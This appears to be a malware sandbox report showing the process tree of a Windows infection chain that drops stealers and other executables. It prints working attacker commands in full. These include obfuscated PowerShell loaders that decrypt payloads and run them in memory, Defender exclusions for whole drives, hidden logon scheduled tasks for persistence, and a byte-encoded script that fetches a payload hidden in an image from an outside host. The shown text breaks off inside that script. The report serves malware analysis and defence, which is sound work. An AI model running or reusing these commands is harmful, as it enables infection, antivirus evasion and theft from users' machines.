        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff852d946f8,0x7ff852d94708,0x7ff852d94718
        6⤵
        
        PID:5308
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --no-sandbox --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2164 /prefetch:2
        6⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1476
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2196 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3192
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2688 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4004
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=16144 --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
        6⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:6164
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=16144 --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
        6⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:6516
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=16144 --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
        6⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:5692
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=16144 --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:1
        6⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:5672
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C taskkill /F /IM firefox.exe
        5⤵
        
        PID:264
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1412
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C taskkill /F /IM Firefox.exe
        5⤵
        
        PID:4072
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Firefox.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5756
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C taskkill /F /IM Firefox.exe
        5⤵
        
        PID:4140
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Firefox.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6168
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C taskkill /F /IM firefox.exe
        5⤵
        
        PID:6472
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6928
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C taskkill /F /IM Firefox.exe
        5⤵
        
        PID:6216
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Firefox.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7008
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C taskkill /F /IM Firefox.exe
        5⤵
        
        PID:7096
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Firefox.exe
        6⤵
        Kills process with taskkill
        
        PID:1880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe"
        5⤵
        
        PID:4676
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 1
        6⤵
        
        PID:5504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:3288
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4648
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5696
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5924
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:2548
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\withroot')
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6052
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 2156
        7⤵
        Program crash
        
        PID:6540
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network25450Man.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network25450Man')
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:6728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5372
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\10002870122\UpdatedAdmin.cmd" "
        9⤵
        
        PID:6240
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\10002870122\UpdatedAdmin.cmd';$nPrC='LoGoteadGote'.Replace('Gote', ''),'FITAkrITAkomBITAkaITAksITAke6ITAk4SITAktrITAkingITAk'.Replace('ITAk', ''),'EwCHintwCHirwCHiywCHiPwCHioiwCHintwCHi'.Replace('wCHi', ''),'SpePUtlitePUt'.Replace('ePUt', ''),'DecYisdompYisdrYisdeYisdsYisdsYisd'.Replace('Yisd', ''),'TsNkHrasNkHnssNkHfosNkHrsNkHmFsNkHinsNkHalsNkHBlosNkHcsNkHksNkH'.Replace('sNkH', ''),'CrfXbxeatfXbxeDfXbxecrfXbxypfXbxtfXbxorfXbx'.Replace('fXbx', ''),'MMLdxaMLdxinMLdxMoMLdxduMLdxleMLdx'.Replace('MLdx', ''),'ElIeKReIeKRmIeKReIeKRnIeKRtAIeKRtIeKR'.Replace('IeKR', ''),'InHUKcvHUKcokHUKceHUKc'.Replace('HUKc', ''),'ReazMwFdLzMwFizMwFneszMwF'.Replace('zMwF', ''),'ChaJonanaJongeEaJonxtaJonenaJonsaJoniaJonoaJonnaJon'.Replace('aJon', ''),'GepcketpckeCpckeurpckerepckentPpckerocpckeepckesspcke'.Replace('pcke', ''),'CQogZopQogZyTQogZoQogZ'.Replace('QogZ', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($nPrC[12])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kMdJS($RQSTg){$zmvMN=[System.Security.Cryptography.Aes]::Create();$zmvMN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zmvMN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zmvMN.Key=[System.Convert]::($nPrC[1])('ML5/q9cXAh8zwmdF4WccY8ENAkFEsjrEy+dUpWTmk7k=');$zmvMN.IV=[System.Convert]::($nPrC[1])('zFU4xrxhUym0St+7yBu7eA==');$pWysh=$zmvMN.($nPrC[6])();$OefOm=$pWysh.($nPrC[5])($RQSTg,0,$RQSTg.Length);$pWysh.Dispose();$zmvMN.Dispose();$OefOm;}function PFVVL($RQSTg){$eAKke=New-Object System.IO.MemoryStream(,$RQSTg);$LAgIa=New-Object System.IO.MemoryStream;$nDRnz=New-Object System.IO.Compression.GZipStream($eAKke,[IO.Compression.CompressionMode]::($nPrC[4]));$nDRnz.($nPrC[13])($LAgIa);$nDRnz.Dispose();$eAKke.Dispose();$LAgIa.Dispose();$LAgIa.ToArray();}$LXMkx=[System.IO.File]::($nPrC[10])([Console]::Title);$NXZhU=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 5).Substring(2))));$MPjpB=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 6).Substring(2))));[System.Reflection.Assembly]::($nPrC[0])([byte[]]$MPjpB).($nPrC[2]).($nPrC[9])($null,$null);[System.Reflection.Assembly]::($nPrC[0])([byte[]]$NXZhU).($nPrC[2]).($nPrC[9])($null,$null); "
        10⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        10⤵
        
        PID:6824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4664
  - - C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
      "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:3236
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 568
        5⤵
        Program crash
        
        PID:4180
  - - C:\Users\Admin\AppData\Local\Temp\1011459001\98b117a7c2.exe
      "C:\Users\Admin\AppData\Local\Temp\1011459001\98b117a7c2.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:5004
    - - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
        
        "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5532
      - C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:6884
      - C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5792
        
        C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5072
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 1292
        8⤵
        Program crash
        
        PID:2308
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 1316
        8⤵
        Program crash
        
        PID:840
      - C:\Users\Admin\AppData\Local\Temp\1002824001\8f3dd0e015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1002824001\8f3dd0e015.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6376
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 1488
        7⤵
        Program crash
        
        PID:316
      - C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6920
      - C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5044
      - C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\pyexec.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pyexec.exe"
        7⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
        
        C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
        8⤵
        
        PID:6032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        9⤵
        
        PID:6856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 384
        10⤵
        Program crash
        
        PID:772
      - C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
        6⤵
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
        7⤵
        
        PID:5912
        
        C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
        8⤵
        
        PID:5580
        
        C:\Users\Admin\10009130102\Properties.exe
        
        "C:\Users\Admin\10009130102\Properties.exe"
        8⤵
        
        PID:4488
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,